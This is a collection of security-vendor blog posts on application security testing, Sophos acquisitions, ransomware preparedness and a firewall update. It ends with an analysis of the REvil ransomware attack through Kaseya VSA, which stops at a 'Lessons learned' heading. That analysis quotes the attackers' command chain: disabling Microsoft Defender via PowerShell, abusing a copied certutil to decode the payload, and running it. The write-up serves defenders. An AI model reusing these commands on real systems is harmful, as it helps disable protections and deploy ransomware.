Shifting left has been a buzzword in the application security space for several years now, and with good reason – making security an integral part of development is the only practical approach for modern agile workflows. But in their drive to build security testing into development as early as possible, many organizations are neglecting application security in later phases and losing sight of the big picture.

Shifting left: misunderstood, misapplied, and absolutely necessary

In the AppSec industry, we’ve been repeating the shift left mantra for years, saying over and over that the only way to ensure effective and efficient application security testing is to integrate it with the development process. While absolutely true, this includes one tiny yet critical assumption: that you are also doing application security testing on the right, i.e. in staging and production. What’s more, the very term “shift left” can be misunderstood as moving all security testing to development – and doing that can leave gaping holes in your security.

Let’s say you do extensive security testing during development, and you feel pretty confident that as they go into staging and production, your applications contain no significant vulnerabilities. But even if that is true (and that’s a big “if”), vulnerabilities might crop up after deployment due to configuration or version differences. New vulnerabilities may be discovered in your technology stack, whether in frameworks, libraries, or other components. New attack techniques may appear in the wild. And finally, your security testing will only cover new and updated code that goes through your left-shifted pipeline – existing sites and applications will be untouched by security testing, as will third-party products that are used in your organization.

There is no question that extending security testing tools and workflows to involve the developers is a must if security is to keep up with the pace of change enforced by agile development. In fact, we have a whole white paper about it. But checking new code for vulnerabilities is only one piece of the security puzzle – and to build the complete puzzle, you need a broader view.

Building an AppSec program that works

Professional web development is not easy. Developers already have their hands full making features work while keeping up with the latest technologies and meeting all the requirements and release deadlines. If you decide to shift security testing left by simply bolting on more test tools, you are piling even more tasks and alerts onto your overworked devs. Unless they are actionable, the extra alerts will only increase noise for little security benefit.

One way to deal with this while keeping sight of the big picture is to base your application security program around dynamic application security testing (DAST). Modern DAST solutions are accurate enough to provide useful feedback to developers but also versatile enough to operate in all stages of development, testing, and production. Invicti products also feature asset discovery, so you always know what you have and what you need to secure.

For Netsparker specifically, a crucial benefit is that with Proof-Based Scanning technology, you can provide developers with actionable reports about real, exploitable vulnerabilities, complete with best-practice remediation guidance. Using out-of-the-box integrations with popular issue trackers, you can even automatically create tickets in the tools your teams already use. And when the additional IAST module is deployed, vulnerability reports for developers can include details down to the specific line of code, making remediation much easier.

This completely changes the dynamics of application security testing. Instead of a flood of vague recommendations saying “this bit could be insecure, you may want to take a look,” developers get factual, actionable tickets in their favorite issue tracker. Instead of rewriting code to make the alert go away, they know that they are fixing a specific and exploitable vulnerability that malicious actors could use to attack the application. That way, the extra work done on security issues makes a real and measurable difference to your overall security posture.

Reducing and avoiding security debt

The idea of technical debt is well-known in the development world. You might have lots of code that depends on an outdated library, but the old library is still good enough. Updating all that code would mean lots of extra work and testing, so it always gets put off for later in favor of more urgent and valuable projects. This technical debt often accumulates until something breaks, and then you fix it because you really have to. Now apply this exact same concept to security, replacing “until something breaks” with “until you have a breach” – and you have your security debt.

For application security, this debt can accumulate on many levels, from using known vulnerable components to treating your web application firewall (WAF) as a long-term solution rather than a band-aid until a vulnerability fix is ready. You might even get recurring debt, where the same types of vulnerabilities keep coming up over and over again due to poor coding practices or insufficient remediation guidance. All this adds up until many organizations give up on systematically securing all their applications because no matter what they do, their security backlog keeps growing.

The only way to deal with security debt is to resolve security issues as you go rather than sweeping them under the carpet. To get there, you need to give your developers the tools and processes to fix vulnerabilities quickly and permanently. This is where the value of a DAST-centric shift-left program with a proof-based approach becomes evident. Focusing on actual weaknesses that could be exploited by attackers helps you continuously improve security and coding practices to prevent security issues from piling up.

Security is all about the big picture

Recent high-profile incidents are finally hammering home the message that in modern web security, there’s no such thing as an unimportant application. Attackers can pick their time and place even as the attack surface of applications (and organizations) continues to grow, spanning new and existing code, multiple web technology stacks, open-source libraries, third-party components, and more. To know your true security posture, you need to start with the big picture before drilling into specific vulnerabilities.

Modern vulnerability scanning solutions such as Netsparker by Invicti are highly accurate and can run full scans in a matter of hours and incremental scans in minutes. For existing applications, this allows you to scan your entire environment for vulnerabilities as often as you need – even daily if that’s what your security policy mandates. For security testing in the development pipeline, it means giving rapid and actionable feedback to developers who can then quickly and effectively fix security issues in their own code.

All the time, you have full visibility into your current security posture while also improving your long-term application security. And because you are working with reliable data, your security and development professionals are not wasting time on inefficient communication or misleading results.

This is shifting left done right.

Source: Netsparker

A third of retail organizations pay the ransom

To maintain the best possible security stance and protect your sensitive data against cyberattacks, you cannot just rely on security products alone. Here is a list of seven key elements that we believe should be considered in your web app security strategy.

1. Include everyone in security practices

Some businesses still believe that security should only be the concern of a specialized team. In the current business environment, such an approach is not viable:

• The increasing cybersecurity skill gap means that security teams are unable to catch up to business growth.
• A dedicated security team becomes a bottleneck in the development processes.
• If security is reactive, not proactive, there are more issues for the security team to handle.

The current best practice for building secure software is called SecDevOps. This approach, which goes further than DevSecOps, assumes that every person involved in web application development (and any other application development) is in some way responsible for security. Developers know how to write secure code. QA engineers know how to apply security policies to their tests. All the management and executives have security in mind when making key decisions.

An effective secure DevOps approach requires a lot of education. Everyone must be aware of the security threats and risks, understand potential application vulnerabilities, and feel responsible for security. While this requires a lot of time and effort, the investment pays off with top-notch secure applications.

2. Adopt a cybersecurity framework

Cybersecurity is very complex and requires a well-organized approach. It’s easy to forget about certain aspects and just as easy to fall into chaos. That is why many organizations base their security strategy on a selected cybersecurity framework.

A cybersecurity framework is a strategic approach that begins with detailed research on security risks and includes activities such as developing a cyber incident response plan along with suitable application security checklists. The bigger the organization, the more such a strategic approach is needed.

Another advantage of adopting a cybersecurity framework is the realization that all cybersecurity is interconnected and web security cannot be treated as a separate problem.

3. Automate and integrate security tools

In the past, security teams performed application security testing manually using dedicated security solutions. For example, a security researcher would first use a simple vulnerability scanner and then manually perform additional penetration testing using open-source tools. However, in the current security landscape, such an approach is not optimal. Just like in the whole IT industry, the most efficient IT security processes are based on automation and integration.

Many security tools are now developed with such automation and integration in mind. For example, business-grade vulnerability scanners are intended to be integrated with other systems such as CI/CD platforms and issue trackers. There are several advantages to such an approach:

• The less manual work, the less room for error. If security processes are automated and integrated, nobody can, for example, forget about scanning a web application before it is published.
• If security is integrated into the software development lifecycle (SDLC), issues can be found and eliminated much earlier. This saves a lot of time and makes remediation much easier.
• If security tools work together with other solutions used in software development, such as issue trackers, security issues can be treated the same as any other issue. Engineers and managers don’t lose time learning and using separate tools for security purposes.

4. Follow secure software development practices

There are two key aspects to secure software development:

1. Practices that help you make fewer errors when writing application code
2. Practices that help you detect and eliminate errors earlier

In the first case, software developers must be educated about potential security problems. They must understand SQL injections, cross-site scripting (XSS), cross-site resource forgery (CSRF), and more vulnerabilities and misconfiguration such as the ones listed in the OWASP Top 10. They must also know secure coding techniques required to prevent such vulnerabilities, for example, they must know how to prevent SQL injections.

In the second case, what helps most is scanning for security vulnerabilities as early as possible in the development lifecycle. If you integrate security tools into your DevOps pipelines, as soon as the developer commits new or updated functionality, they are informed about any vulnerabilities in it. Because this is done immediately, it also makes such vulnerabilities much easier to fix because the developer still remembers the code that they were working on. It also guarantees that the developer can correct their own code, and not waste time trying to understand code written by someone else a long time ago.

5. Use diverse security measures

There are many aspects of web security and no single tool can be perceived as the only measure that will guarantee complete safety. The key tool for web application security is the vulnerability scanner. However, even the best vulnerability scanner will not be able to discover all vulnerabilities such as logical errors or bypass complex access control/authentication schemes without human intervention.

Vulnerability scanning must not be treated as a replacement for penetration testing. Also, to fully secure web servers, vulnerability scanning must be combined with network scanning. Luckily, some vulnerability scanners are integrated with network security scanners, so the two activities may be handled together.

In addition to vulnerability scanners that are based on DAST or IAST technologies, many businesses additionally choose to use a SAST (source code analysis) tool at early stages, for example in the SecDevOps pipelines or even earlier, on developer machines. Such a tool is a very useful addition, but because of its limitations (such as the inability to secure third-party elements), it cannot replace a DAST tool.

Some businesses believe that the best way to protect against web-related threats is to use a web application firewall (WAF). However, a WAF is just a band-aid tool that eliminates potential attack vectors. While a WAF is an important part of a complete security suite for an enterprise and the best way to handle zero-day vulnerabilities through virtual patching, it should not be treated as the most important line of defense.

All in all, you should use diverse security measures, but you should not just believe that purchasing them and giving them to your security team will solve the problem. These security measures must be integrated with your entire environment and automated as much as possible. They are there to reduce the amount of work that the security team has, not increase it.

6. Perform security exercises

One of the best ways to check if your sensitive information is safe is to perform mock attacks. This is the key assumption behind penetration testing but penetration tests are just spot-checks. To fully and continuously evaluate your security stance, the best way is to perform continuous security exercises such as red team vs. blue team campaigns.

The idea behind red teaming is to hire an external organization that continuously tries to challenge your security and to establish a local team that is in charge of stopping such attempts. There are many advantages to this approach. A continuous exercise means that your business is always prepared for an attack. It also helps with maintaining general security awareness, since the blue team involves much more than just a dedicated security team.

A dedicated red team does not just exploit security vulnerabilities. They often perform different types of mock attacks (including phishing, social engineering, DDoS attacks, and others) to help you protect against real ones. The added advantage is also the realization of how different security elements are woven together and cannot be treated separately.

7. Maintain a bounty program

Many top-notch security professionals prefer to work as freelancers instead of being hired by businesses either full-time or on a project basis. Losing out on such outstanding expertise is a huge waste. Your business can use such valuable resources by establishing a bounty program.

While some businesses may perceive a bounty program as a risky investment, it quickly pays off. It also increases the respect that your brand has in the hacking community and, consequently, the general brand perception. If you have a bounty program and treat independent security experts fairly, your brand is perceived as mature and proud of its security stance. You may strengthen such perception by publicly disclosing bounty program payoffs and responsibly sharing information about any security vulnerability discoveries and data breaches.

Source: Acunetix

Optimizing Managed Threat Response (MTR) and Extended Detection and Response (XDR) with Security Orchestration Automation and Response (SOAR) Capabilities.

“I’m excited to share that Sophos has acquired Refactr, which develops and markets a versatile DevSecOps automation platform that bridges the gap between DevOps and cybersecurity” said John Levy, Sophos Chief Technical Officer.

As DevOps and security teams continue to adopt “IT-as-Code” approaches to managing their environments, Refactr’s ability to automate any of these processes enables teams to scale. Refactr has leading customers in both the private and government/public sectors, including the Center for Internet Security, and the US Air Force’s Platform One.

Sophos is optimizing Refactr’s DevSecOps automation platform to add Security Orchestration Automation and Response (SOAR) capabilities to our Managed Threat Response (MTR) and Extended Detection and Response (XDR) solutions. The SOAR capabilities will also help automate Sophos’ Adaptive Cybersecurity Ecosystem, which underpins all of Sophos’ product solutions, services, and alliance integrations.

First-generation SOAR solutions have moved our industry forward in significant ways, but we’re now witnessing an evolution where more and more businesses are becoming software companies, and our security solutions need to evolve in parallel. As we’ve seen in recent supply-chain incidents, attackers are increasingly targeting software development pipelines, and defenders need the ability to shift further left of attackers. The industry needs SOAR to mature into more capable and generalizable DevSecOps solutions, and Sophos’ acquisition of Refactr will help us lead the way.

With Refactr, Sophos will fast track the integration of such advanced SOAR capabilities into our Adaptive Cybersecurity Ecosystem, the basis for our XDR product and MTR service. We will provide a full spectrum of automated playbooks and pipelines for our customers and partners, from drag-and-drop to fully programmable, along with broad integrations with third-party solutions through our technology alliances program to work with today’s diverse IT environments.

Sophos will continue to develop and offer Refactr’s platform to their existing and growing base of partners and organizations that want to build customized IT and security automations for themselves and for their customers. Refactr’s Community Edition will continue to be available as well.

“We created the Refactr platform so that every organization can achieve DevSecOps through holistic security-first automation. Our platform was purpose-built to be versatile, interoperable and easy to use. We are proud of what we accomplished at Refactr and excited for the next part of our journey with Sophos to help create a more secure world through DevSecOps.” Michael Fraser, CEO and co-founder, Refactr

We could not be more excited to add Refactr technologies to the Sophos portfolio and we plan to begin offering SOAR options by early 2022. In the meantime, on behalf of Sophos, I would like to extend a very warm welcome to Refactr employees, customers, and partners.

Source: Sophos

I’m thrilled to announce that Sophos has acquired Braintrace, an innovator in Network Detection and Response (NDR) technology. Braintrace’s NDR provides deep visibility into network traffic patterns, including encrypted traffic, without the need for Man-in-the-Middle (MitM) decryption.

Braintrace’s NDR technology will enhance and extend Sophos’ Managed Threat Response (MTR), Rapid Response, and Extended Detection and Response (XDR) solutions through integration into the Adaptive Cybersecurity Ecosystem, which underpins all Sophos products and services. With the integration of Braintrace, defenders will benefit from an ‘air traffic control system’ that sees all network activity, reveals unknown and unprotected assets, and exposes evasive malware more reliably than Intrusion Protection Systems (IPS).

We’re particularly excited that Braintrace built this technology specifically to provide better security outcomes to their Managed Detection and Response (MDR) customers. It’s hard to beat the effectiveness of solutions built by teams of skilled practitioners and developers to solve real world cybersecurity problems.

The Braintrace technology will also serve as the launchpad to collect and forward third-party event data from firewalls, proxies, virtual private networks (VPNs), and other sources. These additional layers of visibility and event ingestion will significantly improve threat detection, threat hunting and response to suspicious activity.

Sophos will deploy Braintrace’s NDR technology as a virtual machine, fed from traditional observability points such as a Switched Port Analyzer (SPAN) port or a network Test Access Point (TAP) to inspect both north-south traffic at boundaries or east-west traffic within networks. These deployments help discover threats inside any type of network, including those that remain encrypted, serving as a complement to the decryption capabilities of Sophos Firewall. As a virtual machine, Braintrace’s NDR technology can run both on-premises and in the cloud to protect your network.

The technology’s packet and flow engine feeds a variety of machine learning models trained to detect suspicious or malicious network patterns, such as connections to Command and Control (C2) servers, lateral movement and communications with suspicious domains. Since Braintrace built its NDR technology specifically for predictive, passive monitoring, its engine also provides intelligent network packet capture that IT security administrators and threat hunters can use as supporting evidence during investigations. The novel NDR analysis and prediction technique is patent pending.

“We built Braintrace’s NDR technology from the ground up for detection and now, with Sophos, it will fit into a complete system to provide cross-product detection and response across a multi-vendor ecosystem” said Bret Laughlin, CEO and co-founder, Braintrace.

Sophos plans to introduce Braintrace’s NDR technology for MTR and XDR in the first half of 2022. In the meantime, on behalf of Sophos, I would like to extend a warm welcome to all Braintrace customers, partners and employees.

Source: Sophos

Ransomware attacks have all but dominated news headlines in recent weeks. Managed service providers (MSPs) know the risks of ransomware and how important it is to have a plan in place to respond to an attack when they have an impacted client. There are many different factors to consider, but it’s best practice to have a strategy for detection, prevention, and response. We put together a comprehensive infographic on the journey of ransomware and how MSPs can prepare their clients – here’s a preview.

How Can MSPs Prevent Ransomware Attacks?

The reality is, there is no foolproof way to prevent a ransomware attack. Even the most protected and prepared businesses can fall victim to ransomware. However, MSPs can take steps to lower the chances of their SMB clients falling victim to an attack.

Arm clients with antivirus. These tools have been around a long time but are still critical in a ransomware prevention strategy. Automate patch management. When software providers identify bugs, they publish that info and offer a patch. With automated patching, businesses are less susceptible to being exploited by bad actors looking to capitalize on those bugs. Implement tools with ransomware detection capabilities. Often, ransomware attacks can infiltrate a business’s systems, going undetected. One way to drastically improve ransomware prevention is to have tools that identify it before it spreads across a network.

The Journey of Crypto-Ransomware: Detection, Response, and Prevention

In this infographic, we break down how ransomware is spread and share tips to help businesses establish plans to prevent, detect, and respond to ransomware attacks.

Detecting a Ransomware Attack

Ransomware attacks can go undetected, but there are ways to identify if a hacker may have impacted your client. Be sure your clients notify you if they see unusual changes to file names, lockout screens, or a pop-up with a ransom note.

Responding to a Ransomware Attack

If a ransomware attack is detected, it’s important to respond as quickly as possible. First, scan networks to confirm that an attack is underway, and once identified, isolate the infected computer(s) immediately. Immediately secure backup data or systems by taking them offline and ensure backups are free of malware. These are the immediate steps to take when alerted of an attack. From here, MSPs should focus on ensuring hackers can’t get back in.

These are just a few ways to prepare for a ransomware attack and are certainly not a comprehensive list. To learn more about how MSPs can help prevent their SMB clients from falling victim to a ransomware attack, take a look at our infographic, The Journey of Crypto-Ransomware: Detection, Response, and Prevention.

Source:Datto

The product team is pleased to announce the early access program for SFOS v18.5 MR1 for all Sophos (XG) Firewall devices and all SFOS form factors – XGS Series, XG Series, virtual and software appliances, as well as all supported cloud platforms.

SFOS v18.5 MR1 includes support for new Sophos Central Orchestration capabilities and a number of important security fixes and enhancements.

What’s new in v18.5 MR1

Support for new Central Orchestration subscription (included in the new Xstream Protection license bundle):

• Central SD-WAN VPN Orchestration enables easy point-and-click site-to-site VPN orchestration from Sophos Central – automatically configuring the necessary tunnels and firewall access rules for your desired SD-WAN overlay network.
• Central Firewall Reporting Advanced with 30-days of data retention for full multi-firewall reporting in Sophos Central with access to all pre-packaged reports, plus flexible custom report capabilities and the option to save, schedule, or export your reports.
• Sophos MTR/XDR connector to enable Sophos Firewall intelligence and data to be used as part of our 24/7 Managed Threat Response service, or as part of your self-managed, cross-product extended detection and response solution.

Get the full details on Central Orchestration and how to take advantage of it.

Additional enhancements:

• Resolved FragAttack vulnerabilities recently discovered in the Wi-Fi specification for all internal and add-on Wi-Fi modules for Sophos (XG) Firewall desktop series appliances. All other updates will follow as outlined in this advisory.
• Enhanced backup/restore support improves backup/restore operations across different models by better mapping the management ports. v18.5 MR1 can also restore backups from v18 MR5 and earlier, including any older v17.5 MRs.
• XGS Series reset button enables a long press of the hardware reset button on XGS Series appliances (XGS 116 and higher models) to perform a factory reset to help recover from a bad configuration.
• VPN tunnel logging adds improved logging of VPN tunnel flap events and IPsec IKEv2 rekeying.
• Sophos DDNS (myfirewall.com) will be discontinued and no longer supports new registrations. This is planned from January 31, 2022. Refer to KBA-41764 for more details.

How to get early access and provide feedback

This release is available for early access to all Sophos (XG) Firewall devices: XGS Series, XG Series, virtual, cloud, and all supported platforms running SFOS.

Get the full details and download links here.

You can provide early access feedback directly to the product team using the new and improved in-product feedback mechanism introduced with v18.5. Simply click the feedback link at the top right of the web console UI. Alternatively, you can provide your feedback via the community.

This release is expected to be generally available and rolled out automatically to all customer devices starting in early August.

Source: Sophos

Sophos acquired Capsule8. “I’m excited to share that Sophos has acquired Capsule8, a pioneer and market leader of runtime visibility, detection and response for Linux production servers and containers covering both on-premises and cloud workloads” said Dan Schiappa, Chief Product Officer at Sophos.

Sophos already protects more than two million servers for over 85,000 customers worldwide. Comprehensive server protection is a crucial component of any effective cybersecurity strategy. This deal expands our portfolio of Detection and Response Solutions and Services for underprotected server and cloud environments. It’s great news for anyone looking for a strong and lightweight layer of Linux security with strategically important visibility and detection for their servers and containers, and for organizations who want a single vendor for end-user compute and server workloads.

Linux servers: A growing vector of attack

Use of cloud platforms has grown considerably over recent years, and the pandemic further accelerated the move from on premises servers to cloud-based server workloads. With Linux now the dominant operating system for server workloads, it’s easy to understand why adversaries are adapting and customizing their approach to attack these systems.

SophosLabs threat intelligence reveals that adversaries are designing tactics, techniques and procedures (TTPs) aimed specifically at Linux systems, often exploiting server software as the initial entry point in their attack. Having a strong layer of Linux security is essential in defending against these attacks.

Extending Sophos protection

Our engineering team is already busy planning the integration of Capsule8 technology into our Adaptive Cybersecurity Ecosystem (ACE). We will also feature Capsule8 technology in our Extended Detection and Response (XDR) solutions, Intercept X server protection products, and Sophos Managed Threat Response (MTR) and Rapid Response services.

Capsule8 technology will provide new Linux telemetry and event information, further enhancing Sophos’ data lake with additional context for advanced threat hunting, security operations and customer protection practices. It also strengthens the ability of Sophos MTR operators and customers using Sophos XDR to find and neutralize suspicious activity before it becomes malicious.

The addition of the Capsule8 technologies to the Sophos portfolio is an exciting time for all of us at Sophos and I look forward to sharing further details of the integration later this year.

In the meantime, on behalf of Sophos I’d like to extend a warm welcome to the Capsule8 employees, customers and partners; we’re delighted to be working with you.

Source: Sophos

In the cybersecurity world, it’s only natural to balance risks and security measures. After all, there is no way to achieve absolute security and therefore you have to say stop somewhere. However, if you rely on excuses and underestimate the threats, you’re very likely to become a victim of a serious attack. Cybercriminals are smart – they attack those who make it easy for them.

I’ve seen businesses treat web application security as less important than, for example, having an antivirus. I can understand such an approach if a business just has a simple marketing site on WordPress. However, I cannot get my head around such carelessness if the business develops professional B2B web applications for huge corporations, which use these web applications to process tons of sensitive information! And yet, yes, this happens!

Here are some of the excuses that I’ve heard when it comes to web application security. I’m including them to help you avoid similar pitfalls when you decide how to proceed with your journey.

“Our software is only for internal use so there’s no attack risk”

The assumption that malicious hackers only attack web applications that are exposed to the public is one of the primary reasons for major data breaches. Not only are inside jobs quite common in the world of cybersecurity but attackers can find a way into the internal network and access internal web applications from there.

You should always treat the security of your web applications the same way no matter whether they are exposed to the public, used through internal networks and VPNs only, or protected by IP filtering and authentication. That means that, for example, if your application is accessible only from a selected range of IPs and requires authentication, it doesn’t mean it’s secure by design. Even worse, criminals may actually seek entry into such applications, in particular, knowing that their creators often treat vulnerabilities as less of a threat and therefore do not even check for them.

In conclusion, scan every application for security vulnerabilities, no matter how well it is protected by network security measures and authentication!

“Our implementation makes it impossible to have vulnerabilities”

I’ve heard this argument from a company, which uses Hibernate ORM for its Java development. The construction of Hibernate supposedly eliminates SQL injection vulnerabilities because the database always returns a single result set. Unfortunately, that is not true. Only some SQL injection attacks are eliminated by this feature of Hibernate but not all of them. This feature also has no impact whatsoever on vulnerabilities that are not related to SQL.

While modern development and implementation environments make some attacks more difficult, there is no environment that can help you prevent all of them – or even a majority of them. If you think that the way that you designed your development and implementation is enough without any security testing included, think again.

In conclusion, test all your applications for security vulnerabilities no matter what development and implementation environments you use (even if they supposedly eliminate security errors).

“We run a security scan once in a while and we never found anything serious”

Some businesses believe that it’s enough to scan their applications every few months, for example, only before a major release. They do not see the need to verify the security of each release candidate and are even less keen to include security scanning as part of their regular DevOps pipelines. The argument is that the scans yielded no major problems up to date.

Such an approach may be compared to leaving your car door unlocked (and your keys in the ignition) in front of the supermarket. Sure, in the majority of cases, nothing will happen because there will be no car burglars around. However, if just one burglar is around and notices that your car is not locked, your vehicle will change its owner pretty quickly. Same in this case: just one major vulnerability that goes undetected between major releases may result in a security breach exposing all your sensitive data and ruining your business reputation.

In conclusion, test your supposedly safe applications even more thoroughly than the ones you’d think are unsafe.

Better safe than sorry

The phrase “better safe than sorry” is very applicable for cybersecurity (and security in general). In my opinion, whatever security decisions you make for your business, you should compare these with the security of your own personal assets. For example, if your apartment is in a block with security at the front door, does it mean you can leave your door unlocked? If no break-in happened in your neighborhood recently, does it mean that you can leave your window wide open when you go to work?

If instead of making excuses you try to assume the worst scenarios, you are much less likely to be the hero of the next headline news about a data breach. And the cost of including web application security in your SDLC compared to the losses that you could incur as a result of the data breach is just like the cost of a door lock compared to the cost of all the valuables in your home.

Make the right choice, not excuses.

Source: Acunetix

At Invicti, we are absolutely thrilled to be recognized for the first time in the Magic Quadrant for Application Security Testing this year.

Gartner is a leading IT research and advisory firm that helps businesses of all sizes evaluate technology and make informed decisions. We feel our acknowledgment in the report is a big deal, especially for a company of our size, and it marks a recognition by Gartner that the application security testing market and technology landscape are evolving. We believe that our approach is at the vanguard of that evolution.

Application security testing is a broad category. It includes everything from software composition analysis (SCA) to static, dynamic, and interactive application security testing. And while traditional SCA and static application security testing (SAST) certainly have their place, especially for taking inventory of open-source components and analyzing source code, a complete security program also requires DAST and IAST.

We are the only vendor in the Magic Quadrant that takes our approach to provide an orchestrated DAST and IAST platform. Invicti Security has intentionally developed Netsparker and Acunetix to uniquely orchestrate DAST and IAST, enabling organizations of all sizes to build a continuous and automated web application security practice.

Our mission is to enable you to vastly improve your security posture with scale and automation, and we do it by delivering unique products. We feel only Invicti – with our DAST, IAST, and dynamic SCA – can cover all of your apps (in development, in production, and even third-party). And only Invicti can do this with the scale, speed, accuracy, and automation you need for your agile (or DevOps) environment.

Bottom line: our intelligent automation, 50+ integrations, and benchmark low rate of false positives make us stand out in a very crowded field of players in application security.

Of course, we’re only getting started. We’ve got lots in store as we continue to innovate on both Netsparker and Acunetix. We look forward to pushing the market to a more modern and scalable approach to application security.

Interested parties can access the full 2021 Gartner Magic Quadrant for Application Security Testing here.

Source: Acunetix

On July 2, while many businesses had staff either already off or preparing for a long holiday weekend, an affiliate of the REvil ransomware group launched a widespread crypto-extortion gambit.  Using an exploit of Kaseya’s  VSA remote management service, the REvil actors launched a malicious update package that targeted customers of managed service providers and enterprise users of the on-site version of Kaseya’s VSA remote monitoring and management platform.

REvil is a ransomware-as-a-service (RaaS), delivered by “affiliate” actor groups who are paid by the ransomware’s developers. Customers of  managed service providers have been a target of REvil affiliates and other ransomware operators in the past, including a ransomware outbreak in 2019 (later attributed to REvil) that affected over 20 small local governments in Texas.  And with the decline of several other RaaS offerings, REvil has become more active. Its affiliates have been exceedingly persistent in their efforts as of late, continuously working to subvert malware protection. In this particular outbreak, the REvil actors not only found a new vulnerability in Kaseya’s supply chain, but used a malware protection program as the delivery vehicle for the REvil ransomware code.

REvil’s operators posted to their “Happy Blog” today, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, but under the condition that they be paid $70,000,000 worth of BitCoin.

Managed Malware Delivery

The outbreak was delivered via a malicious update payload sent out to VSA servers, and in turn to the VSA agent applications running on managed Windows devices. It appears this was achieved using a zero-day exploit of the server platform. This gave REvil cover in several ways: it allowed initial compromise through a trusted channel, and leveraged trust in the VSA agent code—reflected in anti-malware software exclusions that Kaseya requires for set-up for its application and agent “working” folders. Anything executed by the Kaseya Agent Monitor is therefore ignored because of those exclusions—which allowed REvil to deploy its dropper without scrutiny.

The Kaseya Agent Monitor (at C:PROGRAM FILES (X86)KASEYA<ID>AGENTMON.EXE, with the ID being the identification key for the server connected to the monitor instance) in turn wrote out the Base64-encoded malicious payload AGENT.CRT to the VSA agent “working” directory for updates (by default, C:KWORKING). AGENT.CRT is encoded to prevent malware defenses from performing static file analysis with pattern scanning and machine learning when it is dropped.These technologies normally work on executable files (though, as we’ve noted, since this file was deployed within the “working” directory excluded under Kaseya’s requirements, this would not likely have come into play.)

After deploying the payload, the Kaseya agent then ran the following Windows shell commands, concatenated into a single string:

Here’s a breakdown of what’s going on here:

 ping 127.0.0.1 -n 5693 > nul 

The first command is essentially a timer. The PING command has a -n parameter which instructs the Windows PING.EXE tool to send echo requests to the localhost (127.0.0.1)—in this case, 5,693 of them. This acted as a “sleep” function, delaying the subsequent PowerShell command for 5,693 seconds—roughly 94 minutes. The value 5,693 varied per victim, indicating that the number was randomly generated on each VSA server as part of the agent procedure that sent the malicious command down to victims.

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

The next part of the command string is a PowerShell command that attempts to disable core malware and anti-ransomware protections offered by Microsoft Defender:

• Real-time protection
• Network protection against exploitation of known vulnerabilities
• Scanning of all downloaded files and attachments
• Scanning of scripts
• Ransomware protection
• Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
• Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
• Automatic sample submission to Microsoft

These features are turned off to prevent Microsoft Defender from potentially blocking subsequent malicious files and activity.

copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe 

This creates a copy of the Windows certificate utility, CERTUTIL.EXE—a frequently used Living-Off-the-Land Binary (LOLBin), capable of downloading and decoding web-encoded content. The copy is written to C:WINDOWSCERT.EXE.

echo %RANDOM% >> C:Windowscert.exe

This appends a random 5-digit number to the end of the copied CERTUTIL. This may have been an attempt to prevent anti-malware products that watch for CERTUTIL abuse from recognizing CERT.EXE as a CERTUTIL copy by signature.

C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe

The copied CERTUTIL is used to decode the Base64-encoded payload file AGENT.CRT and write it to an executable, AGENT.EXE, in the Kaseya working folder.  AGENT.EXE has a valid Authenticode, signed with a certificate for “PB03 TRANSPORT LTD.” We have only seen this certificate associated with REvil malware; it may be stolen or fraudulently obtained. AGENT.EXE contains a compiler timestamp of July 1, 2021 (14:40:29) – a day before the attack.

del /q /f c:kworkingagent.crt C:Windowscert.exe  

The original payload file C:KWORKINGAGENT.CRT and the copy of CERTUTIL are deleted.

c:kworkingagent.exe

Finally, AGENT.EXE is started by Kaseya’s AGENTMON.EXE process (inheriting its system-level privilege)—and the actual dropping of ransomware begins.

Side-loading for stealth

AGENT.EXE dropped an unexpected file: MSMPENG.EXE, an outdated and expired version of Microsoft’s Antimalware Service executable. This is a benign yet vulnerable application from Windows Defender, version 4.5.218.0, signed by Microsoft on March 23, 2014:

This version of MSMPENG.EXE is vulnerable to side-loading attacks—and we’ve seen this particular version of the application abused before. In a side-load attack, malicious code is put into a dynamic link library (DLL) named to match one required by the targeted executable, and usually placed into the same folder as the executable so it is found before a legitimate copy.

In this case, AGENT.EXE dropped a malicious file named MPSVC.DLL alongside the MSMPENG.EXE executable. AGENT.EXE then executes MSMPENG.EXE, which detects the malicious MPSVC.DLL file and loads it into its own memory space.

The MPSVC.DLL also contains the “PB03 TRANSPORT LTD.” certificate that was applied to AGENT.EXE. The MPSVC.DLL appears to have been compiled on Thursday July 1, 2021 (14:39:06), just prior to the compilation of AGENT.EXE.

From that moment on, the malicious code in MPSVC.DLL hijacks the normal execution flow of the Microsoft branded process, when MSMPENG.EXE calls the ServiceCrtMain function in the malicious MPSVC.DLL (this is also the main function in a benign MPSVC.DLL):

The MSMPENG.EXE, now under control of the malicious MPSVC.DLL, begins to encrypt the local disk, connected removable drives and mapped network drives, all from a Microsoft signed application that security controls typically trust and allow to run unhindered.

From here on out, this REvil ransomware is technically very similar to other recent REvil extortion operations. It executes a NetShell (netsh) command to change firewall settings to allow the local Windows system to be discovered on the local network by other computers (netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes ). Then it begins encrypting files.

The REvil ransomware performs an in-place encryption attack, and so the encrypted documents are stored on the same sectors as the original unencrypted document, making it impossible to recover the originals with data recovery tools. REvil’s efficient file system activity shows specific operations, performed on dedicated threads:

The ransomware  runs storage access (the reading of original documents and writing of encrypted document), key-blob embedding, and document renaming on multiple individual threads for doing faster damage. As each file is encrypted,  a random extension is added to the end of its name.

A ransom note is dropped using the same random extension as part of the filename (for example, “39ats40-readme.txt”.)

There are some factors that stand out in this attack when compared to others. First, because of its mass deployment, this REvil attack makes no apparent effort to exfiltrate data. Attacks were customized to some degree based on the size of the organization, meaning that REvil actors had access to VSA server instances and were able to identify individual customers of MSPs as being different from larger organizations. And there was no sign of deletion of volume shadow copies—a behavior common among ransomware that triggers many malware defenses.

Here’s a video demonstrating how the attack works:

Lessons learned

